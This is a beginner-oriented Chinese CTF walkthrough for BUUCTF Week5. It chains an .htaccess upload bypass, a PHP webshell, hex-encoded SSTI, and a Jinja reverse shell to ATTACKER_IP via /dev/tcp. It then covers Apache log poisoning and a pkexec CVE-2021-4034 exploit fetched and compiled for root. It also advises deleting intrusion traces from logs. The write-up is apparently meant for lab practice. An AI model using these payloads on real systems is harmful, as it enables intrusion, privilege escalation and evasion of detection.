新手也能看懂的CTF靶场通关笔记从.htaccess上传到SUID提权手把手复现BUUCTF Week5第一次接触CTF比赛时看到那些复杂的漏洞利用链总有种看天书的感觉。直到自己动手在虚拟机里复现了整个攻击流程才真正理解每个技术细节的奥妙。本文将用最直白的语言带你一步步还原BUUCTF Week5中的经典漏洞链——从看似无害的.htaccess文件上传到最终获取服务器最高权限的SUID提权。我们不会跳过任何理所当然的步骤每个命令都会解释清楚它的作用就像有位经验丰富的队友在你耳边耐心指导。1. 环境准备与基础概念在开始实战前我们需要搭建一个与比赛环境相似的靶场。推荐使用VirtualBox配合Vagrant快速部署Ubuntu 22.04环境这样既能隔离实验环境又方便随时重置系统。以下是基础配置步骤# 安装VirtualBox和Vagrant sudo apt update sudo apt install -y virtualbox vagrant # 创建靶机目录并初始化 mkdir buuctf-week5 cd buuctf-week5 vagrant init ubuntu/jammy64 vagrant up vagrant ssh为什么选择Ubuntu 22.04因为这个LTS版本长期维护且软件包较新能更好复现现代CTF场景。接下来安装必要的服务组件# 安装Apache、PHP和相关组件 sudo apt install -y apache2 php libapache2-mod-php \ php-curl php-gd php-mbstring php-xml php-zip注意实际比赛环境可能使用特定PHP版本若遇到语法差异可尝试切换版本sudo apt install php7.4 sudo a2dismod php8.1 sudo a2enmod php7.4理解几个关键术语将帮助后续操作.htaccessApache服务器的分布式配置文件可覆盖主配置SSTIServer-Side Template Injection服务端模板注入漏洞SUIDSet User ID特殊文件权限允许以所有者身份执行2. .htaccess文件上传漏洞实战比赛中的第一个突破口往往是最容易被忽视的地方。这次的目标网站存在文件上传功能但限制了可上传的文件类型。常规绕过方法失效后.htaccess成了突破口。2.1 制作恶意.htaccess文件创建一个文本文件并写入以下内容FilesMatch shell.jpg SetHandler application/x-httpd-php /FilesMatch这个配置会让Apache将所有名为shell.jpg的文件当作PHP脚本解析。用十六进制编辑器查看文件头可以理解其工作原理xxd -g 1 .htaccess 00000000: 3c 46 69 6c 65 73 4d 61 74 63 68 20 22 73 68 65 FilesMatch she 00000010: 6c 6c 2e 6a 70 67 22 3e 0a 20 20 20 20 53 65 74 ll.jpg. Set 00000020: 48 61 6e 64 6c 65 72 20 61 70 70 6c 69 63 61 74 Handler applicat 00000030: 69 6f 6e 2f 78 2d 68 74 74 70 64 2d 70 68 70 0a ion/x-httpd-php. 00000040: 3c 2f 46 69 6c 65 73 4d 61 74 63 68 3e 0a /FilesMatch.2.2 上传与验证使用Burp Suite拦截上传请求修改Content-Type为text/plain。上传成功后再上传一个包含PHP代码的jpg文件?php system($_GET[cmd]); ?访问这个jpg文件时添加URL参数?cmdid如果返回当前用户信息说明漏洞利用成功。常见问题排查问题现象可能原因解决方案500内部错误Apache配置限制检查AllowOverride设置文件被删除安全防护扫描尝试使用.htpasswd等变体无执行效果文件路径错误确认上传目录有执行权限3. SSTI十六进制绕过技巧获得初步立足点后我们在网站搜索功能发现了疑似模板注入点。但常规测试字符被过滤这时需要十六进制编码绕过。3.1 识别SSTI漏洞先测试基础注入语法原始输入被过滤{{7*7}} → 返回49 → 存在SSTI但直接使用{{config}}等敏感操作会被拦截。通过十六进制编码可以绕过# 将payload转换为十六进制 {{config}}.encode(hex) # 得到7b7b636f6e6669677d7d在注入点输入\x7b\x7b\x63\x6f\x6e\x66\x69\x67\x7d\x7d3.2 利用SSTI获取Shell成功绕过过滤后构造反向Shell连接{% for x in ().__class__.__base__.__subclasses__() %} {% if Popen in x.__name__ %} {{ x([/bin/bash,-c,bash -i /dev/tcp/ATTACKER_IP/4444 01],stdout-1).communicate() }} {% endif %} {% endfor %}将上述代码转换为十六进制后分段注入。在攻击机监听nc -lvnp 4444提示如果网络限制导致反向Shell失败可尝试用Python创建简易HTTP服务器传输文件python3 -m http.server 80004. 权限提升从www-data到root拿到普通用户权限后我们开始寻找提权路径。首先收集系统信息# 查看内核版本 uname -a # 查找SUID文件 find / -perm -4000 -type f 2/dev/null # 检查可写目录 find / -writable 2/dev/null | grep -v proc4.1 利用Apache日志污染当常规SUID提权路径被封堵时可以尝试通过污染Apache日志执行代码# 定位日志路径 ps aux | grep apache cat /etc/apache2/envvars | grep LOG # 在User-Agent中注入PHP代码 curl -A ?php system(id); ? http://localhost # 包含日志文件执行 php -r include(/var/log/apache2/access.log);4.2 最终SUID提权发现系统安装了较旧版本的pkexec存在已知漏洞# 下载漏洞利用代码 wget http://example.com/CVE-2021-4034.c -O /tmp/pwn.c gcc /tmp/pwn.c -o /tmp/pwn # 执行提权 /tmp/pwn whoami # 现在应该是root如果编译环境缺失可以尝试预编译的二进制文件。以下是常见SUID提权目标对比程序名称利用难度影响范围修复方案pkexec低Polkit 0.105更新到最新版passwd中配置错误修正权限mount高特定文件系统禁用SUID5. 痕迹清理与防御建议完成挑战后别忘了清理入侵痕迹。删除创建的.htaccess文件、Web Shell和日志中的敏感条目。对于防御方建议禁用不必要的.htaccess覆盖功能对上传文件进行内容检测而非仅依赖扩展名定期更新系统组件修补已知漏洞使用最小权限原则运行服务最后分享一个实用技巧在虚拟机中为每个实验创建快照这样可以在不同阶段自由回溯而不用每次都从头搭建环境。